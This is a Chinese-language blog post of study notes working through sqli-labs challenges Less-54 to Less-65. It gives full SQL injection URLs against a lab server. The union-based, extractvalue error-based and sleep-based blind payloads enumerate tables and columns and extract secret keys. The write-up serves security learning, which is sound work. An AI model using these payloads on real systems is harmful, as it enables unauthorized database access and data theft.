sqli_labs学习笔记(一)Less-54~Less-65

肺炎确诊人数增长趋势拟合和预测(截止2月2日)

续上,开门见山

 

sqli_labs学习笔记(一)Less-54~Less-65

暴库:

http://43.247.91.228:84/Less-54/?id=-1′ union select 1,2,database() –+

 sqli_labs学习笔记(一)Less-54~Less-65

challenges

 

爆表:

http://43.247.91.228:84/Less-54/?id=-1′ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() –+

 sqli_labs学习笔记(一)Less-54~Less-65

VYKE8MDNKB

 

暴列:

http://43.247.91.228:84/Less-54/?id=-1′ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’VYKE8MDNKB’ –+

 sqli_labs学习笔记(一)Less-54~Less-65

猜测secret_SXUW key

 

暴值:

http://43.247.91.228:84/Less-54/?id=-1′ union select 1,2,group_concat(secret_SXUW) from challenges.VYKE8MDNKB –+

 

 

sqli_labs学习笔记(一)Less-54~Less-65

思路同上54 ,只不过多一个括号?id=0) 次数为14

 

 

爆表:

http://43.247.91.228:84/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() –+

 sqli_labs学习笔记(一)Less-54~Less-65

VYKE8MDNKB

 

暴列:

http://43.247.91.228:84/Less-55/?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’VYKE8MDNKB’ –+

 sqli_labs学习笔记(一)Less-54~Less-65

secret_SXUW

 

暴值:

http://43.247.91.228:84/Less-55/?id=-1) union select 1,2,group_concat(secret_SXUW) from VYKE8MDNKB –+

 

 

sqli_labs学习笔记(一)Less-54~Less-65

思路同上5455。只不过多一个单引号和括号?id=0’) 次数为14

 

 

 

sqli_labs学习笔记(一)Less-54~Less-65

思路同上,只不过 id=”.$id.” 这里进行了双引号闭合 

 

 

sqli_labs学习笔记(一)Less-54~Less-65

执行sql 语句后,并没有返回数据库当中的数据,所以我们这里不能使用 union 联合注入,这里使用报错注入。

 

爆表:

http://43.247.91.228:84/Less-58/?id=-1′ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) –+

 sqli_labs学习笔记(一)Less-54~Less-65

centos7搭建hadoop2.10高可用(HA)

EZ6LZXJARY

 

暴列:

http://43.247.91.228:84/Less-58/?id=-1′ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’EZ6LZXJARY’))) –+

 sqli_labs学习笔记(一)Less-54~Less-65

secret_B91Y

 

 

 

暴值:

http://43.247.91.228:84/Less-58/?id=-1′ and extractvalue(1,concat(0x7e,(select group_concat(secret_B91Y) from EZ6LZXJARY))) –+

 sqli_labs学习笔记(一)Less-54~Less-65

s4zRNgMzckNdj5E91NqvgYZx

 

 

sqli_labs学习笔记(一)Less-54~Less-65

58,只不过没有单引号 

 

 

 

sqli_labs学习笔记(一)Less-54~Less-65

59,只不过多了双引号和括号?id=0”) 

 

 

sqli_labs学习笔记(一)Less-54~Less-65

同上,只不过多了两个括号和一个双引号?id=0’)) 

 

 

sqli_labs学习笔记(一)Less-54~Less-65

此处union和报错注入都已经失效了,那我们就要使用延时注入了。

 

?id=1)and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=challenges),1,1))=79,0,sleep(10))+

 

当正确的时候时间很短,当错误的时候时间大于 10 秒,此时可以利用脚本进行尝试。前面报错型盲注部分有完整代码

 

 

sqli_labs学习笔记(一)Less-54~Less-65

同上62,只不过是单引号

payload:?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))+

正确时间短,错误时间长

 

 

sqli_labs学习笔记(一)Less-54~Less-65

同上63,只不过是双括号

payload:?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))+

正确时间短,错误时间长

 

 

sqli_labs学习笔记(一)Less-54~Less-65

同上,只不过?id=1)

payload:?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))+

 

 

  感谢看雪提供的学习平台

sqli_labs完

基于Flask框架搭建视频网站的学习日志(一)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享